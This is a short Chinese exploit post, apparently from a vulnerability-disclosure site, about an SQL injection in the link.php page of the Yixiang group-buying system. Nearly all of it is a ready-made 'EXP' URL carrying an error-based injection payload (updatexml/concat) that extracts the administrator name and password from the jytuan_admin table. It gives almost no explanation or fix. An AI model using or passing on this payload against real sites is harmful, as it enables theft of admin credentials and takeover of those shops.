易想购物link.php sql注入漏洞

易想团购系统link.php页面内代码

EXP:
http://www.0day5.com/link.php?act=go&city=sanming&url=secer’) and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from jytuan_admin limit 1)),1))%23

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录